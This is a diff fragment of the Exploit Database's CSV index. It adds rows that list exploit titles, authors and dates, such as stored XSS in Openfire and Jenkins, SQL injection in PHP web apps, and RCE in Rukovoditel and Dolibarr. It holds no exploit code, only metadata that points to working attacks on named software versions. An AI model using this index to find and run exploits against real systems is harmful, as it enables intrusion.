47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
@ -43451,3 +43451,15 @@ id,file,description,date,author,type,platform,port
49229,exploits/jsp/webapps/49229.txt,"Openfire 4.6.0 - 'path' Stored XSS",2020-12-10,j5s,webapps,jsp,
49230,exploits/php/webapps/49230.txt,"Library Management System 2.0 - Auth Bypass SQL Injection",2020-12-10,"Manish Solanki",webapps,php,
49231,exploits/php/webapps/49231.txt,"WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting",2020-12-10,"Ilca Lucian Florin",webapps,php,
49232,exploits/java/webapps/49232.txt,"Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting",2020-12-11,gx1,webapps,java,
49233,exploits/jsp/webapps/49233.txt,"Openfire 4.6.0 - 'groupchatJID' Stored XSS",2020-12-11,j5s,webapps,jsp,
49234,exploits/jsp/webapps/49234.txt,"Openfire 4.6.0 - 'users' Stored XSS",2020-12-11,j5s,webapps,jsp,
49235,exploits/jsp/webapps/49235.txt,"Openfire 4.6.0 - 'sql' Stored XSS",2020-12-11,j5s,webapps,jsp,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,
49237,exploits/java/webapps/49237.txt,"Jenkins 2.235.3 - 'Description' Stored XSS",2020-12-11,gx1,webapps,java,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE",2020-12-11,coiffeur,webapps,php,
49239,exploits/php/webapps/49239.txt,"Supply Chain Management System - Auth Bypass SQL Injection",2020-12-11,"Piyush Malviya",webapps,php,
49240,exploits/php/webapps/49240.py,"Dolibarr 12.0.3 - SQLi to RCE",2020-12-11,coiffeur,webapps,php,
49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,

Can't render this file because it is too large.